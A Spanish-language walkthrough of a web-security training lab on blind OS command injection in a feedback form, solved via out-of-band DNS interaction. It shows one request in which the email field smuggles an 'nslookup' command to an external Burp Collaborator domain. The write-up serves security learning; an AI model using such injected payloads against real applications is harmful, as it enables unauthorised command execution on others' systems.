Entrada

OS Command Injection Lab 4

OS Command Injection Lab 4

Skills

  • Blind OS command injection with out-of-band interaction

Certificaciones

  • eWPT
  • eWPTXv2
  • OSWE
  • BSCP

Descripción

Este laboratorio contiene una Blind OS Command Injection en la función de comentarios. La aplicación ejecuta un comando en la terminal que incluye datos proporcionados por el usuario. El comando se ejecuta de forma asíncrona y no tiene efecto en la respuesta de la aplicación. No es posible redireccionar la salida a una ubicación accesible. Sin embargo, podemos desencadenar out-of-band interactions con un dominio externo. Para resolver el laboratorio, debemos explotar la vulnerabilidad para realizar una consulta DNS a Burp Collaborator


Resolución

Al acceder a la web nos sale esto

Pulsamos en Submit feedback y vemos un formulario

Hacemos click sobre Submit feedback y capturamos la petición con Burpsuite

La respuesta obtenida son unas llaves vacías {}

Nos dirigimos a Burpsuite Collaborator hacemos click en Copy to clipboard, debido a que no recibimos ninguna respuesta que indique que estamos inyectando comandos, esta es la única forma que podemos utilizar para ello, debemos usar este payload en los diferentes campos para ver si son inyectables

1
csrf=zRp2nJC1bIBQPQcICpkP7l9cHlAfYlE8&name=test&email=||nslookup+t712dnvp65v6mtbksuisdlxe95fw3rrg.oastify.com||&subject=test&message=test

Si nos vamos a Burpsuite Collaborator nuevamente veremos que hemos obtenido dos peticiones DNS

Esta entrada está licenciada bajo CC BY 4.0 por el autor.